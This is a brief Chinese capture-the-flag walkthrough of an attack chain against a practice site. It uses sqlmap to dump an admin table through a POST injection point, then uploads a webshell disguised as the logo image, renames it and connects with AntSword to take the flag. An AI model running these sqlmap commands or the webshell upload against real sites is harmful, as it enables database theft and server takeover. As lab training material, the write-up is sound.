sqlmap注入实战(三)
一、寻找网站注入点
得到网站
通过burp,抓包,寻找post注入点
复制到sqlmap的根目录中,创建一个txt文件
输入命令sqlmap.py -r +文件名
由此可知,此为注入点
二、暴库
输入命令sqlmap.py -r +文件名 -dbs
输入命令sqlmap.py -r a.txt -D faka --tables获取表
输入命令sqlmap.py -r a.txt -D faka -T ayangw_config --columns获取字段名
输入命令sqlmap.py -r a.txt -D faka -T ayangw_config -C ayangw_k,ayangw_v --dump获取字段内容,此时你会发现跑不出来,需要到sqlmap中修改文件,添加字段名。
得到管理员用户名和密码,登录后台
三、登录后台
成功登录后台,上传木马文件,寻找上传点,发现可以上传首页logo
选择要上传的文件,上传成功
注意是现在的图片,说明你的文件已经在图片中,打开图片地址,修改后缀即可
四、获取flag
复制地址使用蚁剑连接
连接成功,寻找flag
找到flag,提交flag